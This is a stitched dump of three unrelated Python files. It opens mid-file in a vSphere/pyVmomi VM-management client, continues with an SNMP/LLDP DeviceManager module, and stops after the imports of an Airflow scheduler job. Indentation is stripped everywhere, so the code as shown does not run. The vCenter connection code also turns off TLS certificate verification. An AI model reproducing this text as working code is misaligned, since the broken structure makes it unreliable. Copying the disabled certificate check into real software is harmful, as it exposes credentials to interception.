'path': 'vm',
'select_indices': [2]
},
{
'name': 'folder_traversal_spec',
'type': vim.Folder,
'path': 'childEntity',
'select_indices': [2, 3, 4, 5, 6, 7, 1, 8]
}
]
def get_task_error_message(task):
"""Depending on the error type, a different attribute may contain the error message. This
function will figure out the error message.
"""
message = "faultCause='{}', faultMessage='{}', localizedMessage='{}'".format(
task.info.error.faultCause if hasattr(task.info.error, 'faultCause') else "",
task.info.error.faultMessage if hasattr(task.info.error, 'faultMessage') else "",
task.info.error.localizedMessage if hasattr(task.info.error, 'localizedMessage') else ""
)
return message
class VMWareVMOrTemplate(Entity):
"""
Holds shared methods/properties that VM's and templates have in common.
A VM and a template are the same object type in pyVmomi, due to this they
share many common operations
A template will have 'config.template'==True
"""
def __init__(self, system, raw=None, **kwargs):
"""
        Construct a VMWareVMOrTemplate instance
Args:
system: instance of VMWareSystem
raw: pyVmomi.vim.VirtualMachine object
name: name of VM
"""
super(VMWareVMOrTemplate, self).__init__(system, raw, **kwargs)
self._name = raw.name if raw else kwargs.get('name')
if not self._name:
raise ValueError("missing required kwarg 'name'")
@property
def _identifying_attrs(self):
return {'name': self._name}
@property
def name(self):
return self._name
def refresh(self):
"""
Implemented in the VMWareVirtualMachine and VMWareTemplate classes.
"""
raise NotImplementedError
@property
def uuid(self):
try:
return str(self.raw.summary.config.uuid)
except AttributeError:
return self.name
@property
def host(self):
self.refresh()
return self.raw.runtime.host.name
def delete(self):
self.logger.info(" Deleting vSphere VM/template %s", self.name)
task = self.raw.Destroy_Task()
try:
wait_for(lambda: self.system.get_task_status(task) == 'success', delay=3, timeout="4m")
except TimedOutError:
self.logger.warn("Hit TimedOutError waiting for VM '%s' delete task", self.name)
if self.exists:
return False
return True
def cleanup(self):
return self.delete()
def rename(self, new_name):
task = self.raw.Rename_Task(newName=new_name)
# Cycle until the new named VM/template is found
# That must happen or the error state can come up too
old_name = self._name
self._name = new_name
while not self.exists:
if self.system.get_task_status(task) == "error":
self._name = old_name
return False
time.sleep(0.5)
# The newly renamed VM/template is found
return True
def get_hardware_configuration(self):
self.refresh()
return {
'ram': self.raw.config.hardware.memoryMB,
'cpu': self.raw.config.hardware.numCPU,
}
def get_datastore_path(self, vm_config_datastore):
datastore_url = [str(datastore.url)
for datastore in self.raw.config.datastoreUrl
if datastore.name in vm_config_datastore]
return datastore_url.pop()
def get_config_files_path(self):
self.refresh()
vmfilespath = self.raw.config.files.vmPathName
return str(vmfilespath)
@staticmethod
def _progress_log_callback(logger, source, destination, progress):
logger.info("Provisioning progress {}->{}: {}".format(
source, destination, str(progress)))
def _pick_datastore(self, allowed_datastores):
"""Pick a datastore based on free space."""
possible_datastores = [
ds for ds in self.system.get_obj_list(vim.Datastore)
if ds.name in allowed_datastores and ds.summary.accessible and
ds.summary.multipleHostAccess and ds.overallStatus != "red"]
possible_datastores.sort(
key=lambda ds: float(ds.summary.freeSpace) / float(ds.summary.capacity),
reverse=True)
if not possible_datastores:
raise Exception("No possible datastores!")
return possible_datastores[0]
def _get_resource_pool(self, resource_pool_name=None):
""" Returns a resource pool managed object for a specified name.
Args:
resource_pool_name (string): The name of the resource pool. If None, first one will be
picked.
Returns:
pyVmomi.vim.ResourcePool: The managed object of the resource pool.
"""
if resource_pool_name is not None:
return self.system.get_obj(vim.ResourcePool, resource_pool_name)
elif self.system.default_resource_pool is not None:
return self.system.get_obj(vim.ResourcePool, self.system.default_resource_pool)
return self.system.get_obj_list(vim.ResourcePool)[0]
def _clone(self, destination, resourcepool=None, datastore=None, power_on=True,
sparse=False, template=False, provision_timeout=1800, progress_callback=None,
allowed_datastores=None, cpu=None, ram=None, relocate=False, host=None, **kwargs):
"""Clone this template to a VM
When relocate is True, relocated (migrated) with VMRelocateSpec instead of being cloned
Returns a VMWareVirtualMachine object
"""
try:
vm = self.system.get_vm(destination)
except VMInstanceNotFound:
vm = None
if vm and not relocate:
raise Exception("VM/template of the name {} already present!".format(destination))
if progress_callback is None:
progress_callback = partial(
self._progress_log_callback, self.logger, self.name, destination)
source_template = self.raw
vm_clone_spec = vim.VirtualMachineCloneSpec()
vm_reloc_spec = vim.VirtualMachineRelocateSpec()
# DATASTORE
if isinstance(datastore, six.string_types):
vm_reloc_spec.datastore = self.system.get_obj(vim.Datastore, name=datastore)
elif isinstance(datastore, vim.Datastore):
vm_reloc_spec.datastore = datastore
elif datastore is None:
if allowed_datastores is not None:
# Pick a datastore by space
vm_reloc_spec.datastore = self._pick_datastore(allowed_datastores)
else:
# Use the same datastore
datastores = source_template.datastore
if isinstance(datastores, (list, tuple)):
vm_reloc_spec.datastore = datastores[0]
else:
vm_reloc_spec.datastore = datastores
else:
raise NotImplementedError("{} not supported for datastore".format(datastore))
progress_callback("Picked datastore `{}`".format(vm_reloc_spec.datastore.name))
# RESOURCE POOL
if isinstance(resourcepool, vim.ResourcePool):
vm_reloc_spec.pool = resourcepool
else:
vm_reloc_spec.pool = self._get_resource_pool(resourcepool)
progress_callback("Picked resource pool `{}`".format(vm_reloc_spec.pool.name))
vm_reloc_spec.host = (host if isinstance(host, vim.HostSystem)
else self.system.get_obj(vim.HostSystem, host)) # could be none
if sparse:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().sparse
else:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().flat
vm_clone_spec.powerOn = power_on
vm_clone_spec.template = template
vm_clone_spec.location = vm_reloc_spec
vm_clone_spec.snapshot = None
if cpu is not None:
vm_clone_spec.config.numCPUs = int(cpu)
if ram is not None:
vm_clone_spec.config.memoryMB = int(ram)
try:
folder = source_template.parent.parent.vmParent
except AttributeError:
folder = source_template.parent
progress_callback("Picked folder `{}`".format(folder.name))
action = source_template.RelocateVM_Task if relocate else source_template.CloneVM_Task
action_args = dict(spec=vm_reloc_spec) if relocate else dict(folder=folder,
name=destination,
spec=vm_clone_spec)
task = action(**action_args)
def _check(store=[task]):
try:
if hasattr(store[0].info, 'progress') and store[0].info.progress is not None:
progress_callback("{}/{}%".format(store[0].info.state, store[0].info.progress))
else:
progress_callback("{}".format(store[0].info.state))
except AttributeError:
pass
if store[0].info.state not in {"queued", "running"}:
return True
store[0] = self.system.get_updated_obj(store[0])
return False
wait_for(_check, num_sec=provision_timeout, delay=4)
if task.info.state != 'success':
self.logger.error(
"Clone VM from VM/template '%s' failed: %s",
self.name, get_task_error_message(task)
)
raise VMInstanceNotCloned(destination)
if template:
entity_cls = VMWareTemplate
else:
entity_cls = VMWareVirtualMachine
if relocate:
self.rename(destination)
return entity_cls(system=self.system, name=destination)
def add_disk(self, capacity_in_kb, provision_type=None, unit=None):
"""
Create a disk on the given datastore (by name)
Community Example used
https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/add_disk_to_vm.py
Return task type from Task.result or Task.error
https://github.com/vmware/pyvmomi/blob/master/docs/vim/TaskInfo.rst
Args:
capacity_in_kb (int): capacity of the new drive in Kilobytes
provision_type (string): 'thin' or 'thick', will default to thin if invalid option
unit (int): The unit number of the disk to add, use to override existing disk. Will
search for next available unit number by default
Returns:
(bool, task_result): Tuple containing boolean True if task ended in success,
and the contents of task.result or task.error depending on state
"""
provision_type = provision_type if provision_type in ['thick', 'thin'] else 'thin'
self.refresh()
# if passed unit matches existing device unit, match these values too
key = None
controller_key = None
unit_number = None
virtual_disk_devices = [
device for device
in self.raw.config.hardware.device if isinstance(device, vim.vm.device.VirtualDisk)]
for dev in virtual_disk_devices:
if unit == int(dev.unitNumber):
# user specified unit matching existing disk, match key too
key = dev.key
unit_number = unit or int(dev.unitNumber) + 1
if unit_number == 7: # reserved
unit_number += 1
controller_key = dev.controllerKey
if not (controller_key or unit_number):
raise ValueError('Could not identify VirtualDisk device on given vm')
# create disk backing specification
backing_spec = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
backing_spec.diskMode = 'persistent'
backing_spec.thinProvisioned = (provision_type == 'thin')
# create disk specification, attaching backing
disk_spec = vim.vm.device.VirtualDisk()
disk_spec.backing = backing_spec
disk_spec.unitNumber = unit_number
if key: # only set when overriding existing disk
disk_spec.key = key
disk_spec.controllerKey = controller_key
disk_spec.capacityInKB = capacity_in_kb
# create device specification, attaching disk
device_spec = vim.vm.device.VirtualDeviceSpec()
device_spec.fileOperation = 'create'
device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
device_spec.device = disk_spec
# create vm specification for device changes
vm_spec = vim.vm.ConfigSpec()
vm_spec.deviceChange = [device_spec]
# start vm reconfigure task
task = self.raw.ReconfigVM_Task(spec=vm_spec)
try:
wait_for(lambda: task.info.state not in ['running', 'queued'])
except TimedOutError:
self.logger.exception('Task did not go to success state: %s', task)
finally:
if task.info.state == 'success':
result = (True, task.info.result)
elif task.info.state == 'error':
result = (False, task.info.error)
else: # shouldn't happen
result = (None, None)
return result
class VMWareVirtualMachine(VMWareVMOrTemplate, Vm):
state_map = {
'poweredOn': VmState.RUNNING,
'poweredOff': VmState.STOPPED,
'suspended': VmState.SUSPENDED,
}
def refresh(self):
self.raw = self.system.get_vm(self._name, force=True).raw
return self.raw
def _get_state(self):
self.refresh()
return self._api_state_to_vmstate(str(self.raw.runtime.powerState))
@property
def ip(self):
ipv4_re = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
self.refresh()
try:
ip_address = self.raw.summary.guest.ipAddress
if not re.match(ipv4_re, ip_address) or ip_address == '127.0.0.1':
ip_address = None
return ip_address
except (AttributeError, TypeError):
# AttributeError: vm doesn't have an ip address yet
# TypeError: ip address wasn't a string
return None
@property
def creation_time(self):
"""Detect the vm_creation_time either via uptime if non-zero, or by last boot time
The API provides no sensible way to actually get this value. The only way in which
vcenter API MAY have this is by filtering through events
Return tz-naive datetime object
"""
vm = self.raw
filter_spec = vim.event.EventFilterSpec(
entity=vim.event.EventFilterSpec.ByEntity(
entity=vm, recursion=vim.event.EventFilterSpec.RecursionOption.self),
eventTypeId=['VmDeployedEvent', 'VmCreatedEvent'])
collector = self.system.content.eventManager.CreateCollectorForEvents(filter=filter_spec)
collector.SetCollectorPageSize(1000) # max allowed value
events = collector.latestPage
collector.DestroyCollector() # limited number of collectors allowed per client
if events:
creation_time = events.pop().createdTime # datetime object
else:
# no events found for VM, fallback to last boot time
creation_time = vm.runtime.bootTime
if not creation_time:
raise VMCreationDateError('Could not find a creation date for {}'.format(self.name))
# localize and make tz-naive
        return creation_time.astimezone(pytz.UTC).replace(tzinfo=None)
def start(self):
if self.is_running:
self.logger.info(" vSphere VM %s is already running", self.name)
return True
self.logger.info(" Starting vSphere VM %s", self.name)
self.raw.PowerOnVM_Task()
self.wait_for_state(VmState.RUNNING)
return True
def stop(self):
if self.is_stopped:
self.logger.info(" vSphere VM %s is already stopped", self.name)
return True
self.logger.info(" Stopping vSphere VM %s", self.name)
# resume VM if it is suspended
self.ensure_state(VmState.RUNNING)
self.raw.PowerOffVM_Task()
self.wait_for_state(VmState.STOPPED)
return True
def restart(self):
self.logger.info(" Restarting vSphere VM %s", self.name)
return self.stop() and self.start()
def suspend(self):
self.logger.info(" Suspending vSphere VM %s", self.name)
if self.is_stopped:
raise VMInstanceNotSuspended(self.name)
else:
self.raw.SuspendVM_Task()
self.wait_for_state(VmState.SUSPENDED)
return True
def delete(self):
self.ensure_state(VmState.STOPPED)
return super(VMWareVirtualMachine, self).delete()
def mark_as_template(self, template_name=None, **kwargs):
self.ensure_state(VmState.STOPPED)
self.raw.MarkAsTemplate()
template = VMWareTemplate(system=self.system, name=self.name, raw=self.raw)
template.refresh()
if template_name and template_name != template.name:
template.rename(template_name)
return template
def clone(self, vm_name, **kwargs):
kwargs['destination'] = vm_name
self.ensure_state(VmState.STOPPED)
return self._clone(**kwargs)
class VMWareTemplate(VMWareVMOrTemplate, Template):
def refresh(self):
self.raw = self.system.get_template(self._name, force=True).raw
return self.raw
def deploy(self, vm_name, timeout=1800, **kwargs):
"""
Clone a VM based on this template, wait for it to reach desired power state.
Returns a VMWareVirtualMachine object
"""
kwargs["power_on"] = kwargs.pop("power_on", True)
kwargs["template"] = False
start_timeout = kwargs.pop("start_timeout", 120)
new_vm = self._clone(vm_name, timeout=timeout, **kwargs)
if kwargs["power_on"]:
desired_state = VmState.RUNNING
else:
desired_state = VmState.STOPPED
new_vm.wait_for_state(desired_state, timeout=start_timeout)
return new_vm
class VMWareSystem(System, VmMixin, TemplateMixin):
"""Client to Vsphere API
Args:
hostname: The hostname of the system.
username: The username to connect with.
password: The password to connect with.
See also:
vSphere Management SDK API docs
https://developercenter.vmware.com/web/dp/doc/preview?id=155
"""
_api = None
_stats_available = {
'num_vm': lambda self: len(self.list_vms()),
'num_host': lambda self: len(self.list_host()),
'num_cluster': lambda self: len(self.list_cluster()),
'num_template': lambda self: len(self.list_templates()),
'num_datastore': lambda self: len(self.list_datastore()),
}
can_suspend = True
can_pause = False
def __init__(self, hostname, username, password, **kwargs):
super(VMWareSystem, self).__init__(**kwargs)
self.hostname = hostname
self.username = username
self.password = password
self._service_instance = None
self._content = None
self._vm_obj_cache = {} # stores pyvmomi vm obj's we have previously pulled
self.kwargs = kwargs
@property
def _identifying_attrs(self):
return {'hostname': self.hostname}
@property
def can_suspend(self):
return True
@property
def can_pause(self):
return False
def _start_keepalive(self):
"""
Send a 'current time' request to vCenter every 10 min as a
connection keep-alive
"""
def _keepalive():
while True:
self.logger.debug(
"vCenter keep-alive: %s", self.service_instance.CurrentTime()
)
time.sleep(600)
t = threading.Thread(target=_keepalive)
t.daemon = True
t.start()
def _create_service_instance(self):
"""
Create service instance and start a keep-alive thread
See https://github.com/vmware/pyvmomi/issues/347 for why this is needed.
"""
try:
# Disable SSL cert verification
context = ssl._create_unverified_context()
context.verify_mode = ssl.CERT_NONE
si = SmartConnect(
host=self.hostname,
user=self.username,
pwd=self.password,
sslContext=context
)
except Exception:
self.logger.error("Failed to connect to vCenter")
raise
# Disconnect at teardown
atexit.register(Disconnect, si)
self.logger.info(
"Connected to vCenter host %s as user %s",
self.hostname, self.username
)
self._start_keepalive()
return si
@threaded_cached_property
def service_instance(self):
"""An instance of the service"""
self.logger.debug("Attempting to initiate vCenter service instance")
return self._create_service_instance()
@threaded_cached_property
def content(self):
self.logger.debug("calling RetrieveContent()... this might take awhile")
return self.service_instance.RetrieveContent()
@property
def version(self):
"""The product version"""
return LooseVersion(self.content.about.version)
@property
def default_resource_pool(self):
return self.kwargs.get("default_resource_pool")
def get_obj_list(self, vimtype, folder=None):
"""Get a list of objects of type ``vimtype``"""
folder = folder or self.content.rootFolder
container = self.content.viewManager.CreateContainerView(folder, [vimtype], True)
return container.view
def get_obj(self, vimtype, name, folder=None):
"""Get an object of type ``vimtype`` with name ``name`` from Vsphere"""
obj = None
for item in self.get_obj_list(vimtype, folder):
if item.name == name:
obj = item
break
return obj
def _search_folders_for_vm(self, name):
# First get all VM folders
container = self.content.viewManager.CreateContainerView(
self.content.rootFolder, [vim.Folder], True)
folders = container.view
container.Destroy()
# Now search each folder for VM
vm = None
for folder in folders:
vm = self.content.searchIndex.FindChild(folder, name)
if vm:
break
return vm
def _build_filter_spec(self, begin_entity, property_spec):
"""Build a search spec for full inventory traversal, adapted from psphere"""
# Create selection specs
selection_specs = [vmodl.query.PropertyCollector.SelectionSpec(name=ss)
for ss in SELECTION_SPECS]
# Create traversal specs
traversal_specs = []
for spec_values in TRAVERSAL_SPECS:
spec = vmodl.query.PropertyCollector.TraversalSpec()
spec.name = spec_values['name']
spec.type = spec_values['type']
spec.path = spec_values['path']
if spec_values.get('select_indices'):
spec.selectSet = [selection_specs[i] for i in spec_values['select_indices']]
traversal_specs.append(spec)
# Create an object spec
obj_spec = vmodl.query.PropertyCollector.ObjectSpec()
obj_spec.obj = begin_entity
obj_spec.selectSet = traversal_specs
# Create a filter spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [obj_spec]
return filter_spec
def get_updated_obj(self, obj):
"""
Build a filter spec based on ``obj`` and return the updated object.
Args:
obj (pyVmomi.ManagedObject): The managed object to update, will be a specific subclass
"""
# Set up the filter specs
property_spec = vmodl.query.PropertyCollector.PropertySpec(type=type(obj), all=True)
object_spec = vmodl.query.PropertyCollector.ObjectSpec(obj=obj)
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [object_spec]
# Get updates based on the filter
property_collector = self.content.propertyCollector
try:
filter_ = property_collector.CreateFilter(filter_spec, True)
except vmodl.fault.ManagedObjectNotFound:
self.logger.warning('ManagedObjectNotFound when creating filter from spec {}'
.format(filter_spec))
return
update = property_collector.WaitForUpdates(None)
if not update or not update.filterSet or not update.filterSet[0]:
self.logger.warning('No object found when updating %s', str(obj))
return
if filter_:
filter_.Destroy()
return update.filterSet[0].objectSet[0].obj
def _get_vm_or_template(self, name, force=False):
"""
Find a VM or template with name 'name'
Instead of using self._get_obj, this uses more efficient ways of
searching for the VM since we can often have lots of VM's on the
provider to sort through.
Args:
name (string): The name of the VM/template
force (bool): Ignore the cache when updating
Returns:
VMWareVirtualMachine object, VMWareTemplate object, or None
"""
if not name:
raise ValueError('Invalid name: {}'.format(name))
if name not in self._vm_obj_cache or force:
self.logger.debug(
"Searching all vm folders for vm/template '%s'", name)
vm_obj = self._search_folders_for_vm(name)
if not vm_obj:
raise VMInstanceNotFound(name)
else:
vm_obj = self.get_updated_obj(self._vm_obj_cache[name])
# If vm_obj is not found, return None.
# Check if vm_obj.config is None as well, and also return None if that's the case.
# Reason:
#
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/VirtualMachine.rst
# The virtual machine configuration is not guaranteed to be available
# For example, the configuration information would be unavailable if the
# server is unable to access the virtual machine files on disk, and is
# often also unavailable during the initial phases of virtual machine creation.
#
# In such cases, from a wrapanapi POV, we'll treat the VM as if it doesn't exist
if not vm_obj or not vm_obj.config:
return None
elif vm_obj.config.template:
entity_cls = VMWareTemplate
else:
entity_cls = VMWareVirtualMachine
self._vm_obj_cache[name] = vm_obj
return entity_cls(system=self, name=name, raw=vm_obj)
def get_vm(self, name, force=False):
vm = self._get_vm_or_template(name, force)
if not vm:
raise VMInstanceNotFound(name)
if isinstance(vm, VMWareTemplate):
raise Exception("Looking for VM but found template of name '{}'".format(name))
return vm
def _list_vms_or_templates(self, template=False, inaccessible=False):
"""
Obtains a list of all VMs or templates on the system.
Args:
template: A boolean describing if a list of templates should be returned
Returns: A list of vim.VirtualMachine objects
"""
# Use some pyVmomi internals to get vm propsets back directly with requested properties,
# so we skip the network overhead of returning full managed objects
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = [
'name', 'config.template',
'config.uuid', 'runtime.connectionState'
]
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
# Ensure get_template is either True or False to match the config.template property
get_template = bool(template)
# Select the vms or templates based on get_template and the returned properties
obj_list = []
for object_content in object_contents:
# Nested property lookups work, but the attr lookup on the
# vm object still triggers a request even though the vm
# object already "knows" the answer in its cached object
# content. So we just pull the value straight out of the cache.
vm_props = {p.name: p.val for p in object_content.propSet}
if vm_props.get('config.template') == get_template:
if (vm_props.get('runtime.connectionState') == "inaccessible" and
inaccessible) or vm_props.get(
'runtime.connectionState') != "inaccessible":
obj_list.append(vm_props['name'])
return obj_list
def get_vm_from_ip(self, ip):
""" Gets the name of a vm from its IP.
Args:
ip: The ip address of the vm.
Returns: The vm name for the corresponding IP."""
vms = self.content.searchIndex.FindAllByIp(ip=ip, vmSearch=True)
# As vsphere remembers the last IP a vm had, when we search we get all
# of them. Consequently we need to store them all in a dict and then sort
# them to find out which one has the latest boot time. I am going out on
# a limb and saying that searching for several vms and querying each object
# is quicker than finding all machines and recording the bootTime and ip address
# of each, before iterating through all of them to weed out the ones we care
# about, but I could be wrong.
boot_times = {}
for vm in vms:
if vm.name not in boot_times:
boot_times[vm.name] = datetime.fromtimestamp(0)
try:
boot_times[vm.name] = vm.summary.runtime.bootTime
except Exception:
pass
if boot_times:
newest_boot_time = sorted(boot_times.items(), key=operator.itemgetter(1),
reverse=True)[0]
            newest_vm_name = newest_boot_time[0]
            newest_vm = next(vm for vm in vms if vm.name == newest_vm_name)
            return VMWareVirtualMachine(system=self, name=newest_vm.name, raw=newest_vm)
else:
raise VMNotFoundViaIP('The requested IP is not known as a VM')
def is_host_connected(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
return host.summary.runtime.connectionState == "connected"
def create_vm(self, vm_name):
raise NotImplementedError('This function has not yet been implemented.')
def list_vms(self, inaccessible=False):
return [
VMWareVirtualMachine(system=self, name=obj_name)
for obj_name in self._list_vms_or_templates(inaccessible=inaccessible)
]
def find_vms(self, *args, **kwargs):
raise NotImplementedError
def list_templates(self):
return [
VMWareTemplate(system=self, name=obj_name)
for obj_name in self._list_vms_or_templates(template=True)
]
def find_templates(self, *args, **kwargs):
raise NotImplementedError
def create_template(self, *args, **kwargs):
raise NotImplementedError
def get_template(self, name, force=False):
vm = self._get_vm_or_template(name, force)
if not vm:
raise NotFoundError("template: {}".format(name))
if isinstance(vm, VMWareVirtualMachine):
raise Exception("Looking for template but found VM of name '{}'".format(name))
return vm
def list_host(self):
return [str(h.name) for h in self.get_obj_list(vim.HostSystem)]
def list_host_datastore_url(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
return [str(d.summary.url) for d in host.datastore]
def list_datastore(self):
return [str(h.name) for h in self.get_obj_list(vim.Datastore) if h.host]
def list_cluster(self):
return [str(h.name) for h in self.get_obj_list(vim.ClusterComputeResource)]
def list_resource_pools(self):
return [str(h.name) for h in self.get_obj_list(vim.ResourcePool)]
def list_networks(self):
"""Fetch the list of network names
Returns: A list of Network names
"""
return [str(h.name) for h in self.get_obj_list(vim.Network)]
def info(self):
# NOTE: Can't find these two methods in either psphere or suds
# return '{} {}'.format(self.api.get_server_type(), self.api.get_api_version())
return '{} {}'.format(self.content.about.apiType, self.content.about.apiVersion)
def disconnect(self):
pass
def _task_wait(self, task):
"""
Update a task and check its state. If the task state is not ``queued``, ``running`` or
``None``, then return the state. Otherwise return None.
Args:
task (pyVmomi.vim.Task): The task whose state is being monitored
Returns:
string: pyVmomi.vim.TaskInfo.state value if the task is not queued/running/None
"""
task = self.get_updated_obj(task)
if task.info.state not in ['queued', 'running', None]:
return task.info.state
def get_task_status(self, task):
"""Update a task and return its state, as a vim.TaskInfo.State string wrapper
Args:
task (pyVmomi.vim.Task): The task whose state is being returned
Returns:
string: pyVmomi.vim.TaskInfo.state value
"""
task = self.get_updated_obj(task)
return task.info.state
def remove_host_from_cluster(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
task = host.DisconnectHost_Task()
status, _ = wait_for(self._task_wait, [task])
if status != 'success':
raise HostNotRemoved("Host {} not removed: {}".format(
host_name, get_task_error_message(task)))
task = host.Destroy_Task()
status, _ = wait_for(self._task_wait, [task], fail_condition=None)
return status == 'success'
def usage_and_quota(self):
installed_ram = 0
installed_cpu = 0
used_ram = 0
used_cpu = 0
for host in self.get_obj_list(vim.HostSystem):
installed_ram += host.systemResources.config.memoryAllocation.limit
installed_cpu += host.summary.hardware.numCpuCores
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = ['name', 'config.template']
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
for vm in object_contents:
vm_props = {p.name: p.val for p in vm.propSet}
if vm_props.get('config.template'):
continue
if vm.obj.summary.runtime.powerState.lower() != 'poweredon':
continue
used_ram += vm.obj.summary.config.memorySizeMB
used_cpu += vm.obj.summary.config.numCpu
return {
# RAM
'ram_used': used_ram,
'ram_total': installed_ram,
'ram_limit': None,
# CPU
'cpu_used': used_cpu,
'cpu_total': installed_cpu,
'cpu_limit': None,
}
def get_network(self, network_name):
"""Fetch the network object from specified network name
Args:
network_name: The name of the network from Vmware
Returns: A object of vim.Network object
"""
network = self.get_obj(vimtype=vim.Network, name=network_name)
if not network:
raise NotFoundError
return network
|
DeviceManager.py
|
from threading import Thread
from queue import Queue
from easysnmp import Session
from config_app.backend.helpers import get_thread_output
from manage_app.backend import parse_model, static
class DeviceManager:
"""
    This class is used to create multiple device objects by retrieving data via SNMP from all devices in the
    specified network.
    Constructor Positional Arguments:
        - user -- django User model object
        - available_hosts -- list of available IP addresses (network devices)
        - snmp_config_id -- id which refers to the initially provided SNMP configuration
"""
def __init__(self, user, available_hosts, snmp_config_id):
self.user = user
self.available_host = available_hosts
self.snmp_config_id = snmp_config_id
self.session_parameters = parse_model.parse_to_session_parameters(self.snmp_config_id)
def __get_single_device_details(self, hostname):
session = Session(hostname=hostname, **self.session_parameters)
device = Device(hostname, session)
return device
def get_multiple_device_details(self):
thread_list = list()
session_queue = Queue()
for host in self.available_host:
            session_thread = Thread(target=lambda in_que, hostname: in_que.put(self.__get_single_device_details(hostname)),
                                    args=(session_queue, host))
session_thread.start()
thread_list.append(session_thread)
devices_details_output = get_thread_output(session_queue, thread_list)
return devices_details_output
class DeviceSystem_:
"""
    This class uses an easysnmp session object to retrieve all SNMP system MIB data.
Constructor Positional Arguments:
- hostname -- IP address of connected device
- session -- easysnmp Session class instance
"""
def __init__(self, hostname, session):
self.system_description = session.get(('sysDescr', 0)).value
self.system_contact = session.get(('sysContact', 0)).value
self.full_system_name = session.get(('sysName', 0)).value
self.system_location = session.get(('sysLocation', 0)).value
self.system_up_time = session.get(('sysUpTime', 0)).value
self.hostname = hostname
class DeviceInterface_:
"""
This class uses easysnmp session object to retrieve all SNMP interface MIB data.
Constructor Positional Arguments:
- number -- interface number
- session -- easysnmp Session class instance
"""
def __init__(self, number, session):
self.interface_idx = session.get(('ifName', number)).oid_index
self.interface_name = session.get(('ifName', number)).value
self.interface_description = session.get(('ifDescr', number)).value
self.interface_type = session.get(('ifType', number)).value
self.interface_mtu = session.get(('ifMtu', number)).value
self.interface_speed = session.get(('ifSpeed', number)).value
self.interface_physical_addr = session.get(('ifPhysAddress', number)).value
self.interface_admin_status = session.get(('ifAdminStatus', number)).value
self.interface_operational_status = session.get(('ifOperStatus', number)).value
self.interface_in_unicast_packets = session.get(('ifInUcastPkts', number)).value
self.interface_in_errors = session.get(('ifInErrors', number)).value
self.interface_out_unicast_packets = session.get(('ifOutUcastPkts', number)).value
self.interface_out_errors = session.get(('ifOutErrors', number)).value
self.lldp_neighbor_name = None
self.lldp_neighbor_interface = None
self.interface_ip = None
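# Note (added for clarity): ipAdEntIfIndex is indexed by IP address and its
# value is the ifIndex the address belongs to, so the walk below keeps the
# OID index (the IP address) whose value matches this interface's index.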
ip_addresses = session.walk('ipAdEntIfIndex')
for snmp_query in ip_addresses:
if snmp_query.value == self.interface_idx:
self.interface_ip = snmp_query.oid_index
class Device:
"""
This class uses both the DeviceInterface_ and DeviceSystem_ classes to merge together all the data and create one
final Device object, including neighbor details.
Constructor Positional Arguments:
- hostname -- IP address of connected device
- session -- easysnmp Session class instance
"""
def __init__(self, hostname, session):
self.hostname = hostname
self.session = session
self.system = DeviceSystem_(self.hostname, self.session)
self.if_number = int(self.session.get(('ifNumber', 0)).value)
self.interfaces = [DeviceInterface_(number, self.session) for number in range(1, self.if_number + 1)]
self.lldp_data = self.__get_lldp_entries()
def __get_lldp_entries(self):
# WARNING: this function works incorrectly when interface descriptions are added - known backend issue with easysnmp walk.
lldp_remote_systems_data = self.session.walk(static.lldp_defined_values['lldpRemoteSystemsData'])
lldp_remote_query = {
'lldp_neighbor_interfaces': list(),
'lldp_neighbor_hostnames': list(),
}
for item in lldp_remote_systems_data:
if static.lldp_defined_values['lldpNeighborInterface'] in item.oid:
lldp_remote_query['lldp_neighbor_interfaces'].append(item.value)
elif static.lldp_defined_values['lldpNeighborHostName'] in item.oid:
lldp_remote_query['lldp_neighbor_hostnames'].append(item.value)
lldp_neighbor_correlation = zip(lldp_remote_query['lldp_neighbor_interfaces'],
lldp_remote_query['lldp_neighbor_hostnames'])
lldp_final_correlation = dict()
for lldp_neighbor_interface, lldp_neighbor_hostname in lldp_neighbor_correlation:
lldp_final_correlation[lldp_neighbor_hostname] = lldp_neighbor_interface
lldp_final_query = {
self.system.full_system_name: lldp_final_correlation
}
return lldp_final_query
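# --- Illustrative sketch (not part of the original module) ---
# __get_lldp_entries() above returns a mapping of the local system name to a
# {neighbor hostname: interface reported for that neighbor} dict. The sample
# data below is made up and only shows the shape of the structure.
if __name__ == '__main__':
    sample_lldp_query = {
        'core-switch-01': {
            'access-switch-02': 'GigabitEthernet0/1',
            'edge-router-01': 'GigabitEthernet0/2',
        }
    }
    for local_system, neighbors in sample_lldp_query.items():
        for neighbor_hostname, neighbor_interface in neighbors.items():
            print('{}: neighbor {} via {}'.format(local_system, neighbor_hostname, neighbor_interface))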
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
